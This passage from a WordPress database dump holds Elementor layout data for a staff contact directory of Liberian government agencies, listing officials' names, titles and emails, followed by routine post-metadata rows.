"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24773,3673,'_last_editor_used_jetpack','classic-editor'),(24774,3673,'_edit_lock','1629363360:42'),(24775,3673,'_edit_last','42'),(24776,3673,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1629065582;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3675;}i:1;a:1:{s:2:\"id\";i:3698;}i:2;a:1:{s:2:\"id\";i:3674;}}}}'),(24777,3674,'_last_editor_used_jetpack','classic-editor'),(24778,3674,'_edit_lock','1629363300:42'),(24779,3674,'_edit_last','42'),(24780,3675,'_last_editor_used_jetpack','classic-editor'),(24781,3675,'_edit_lock','1629363243:42'),(24782,3675,'_edit_last','42'),(24783,3674,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628600224;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3673;}i:1;a:1:{s:2:\"id\";i:3051;}i:2;a:1:{s:2:\"id\";i:3058;}}}}'),(24789,3675,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628251971;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3175;}i:1;a:1:{s:2:\"id\";i:3673;}i:2;a:1:{s:2:\"id\";i:3698;}}}}'),(24793,3679,'_wp_attached_file','2021/04/FINAL-DRAFT-NCSA-METHODOLOGY-UPDATE-TORS-MARCH-19-2021-CCCD.pdf'),(24794,3680,'_last_editor_used_jetpack','classic-editor'),(24795,3680,'_edit_lock','1629363162:42'),(24796,3680,'_edit_last','42'),(24797,3681,'_wp_attached_file','2021/04/FINAL-DRAFT-EPA-ACT-HARMONIZATION-MARCH-19-2021-CCCD.pdf'),(24798,3680,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628948822;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3585;}i:1;a:1:{s:2:\"id\";i:3706;}i:2;a:1:{s:2:\"id\";i: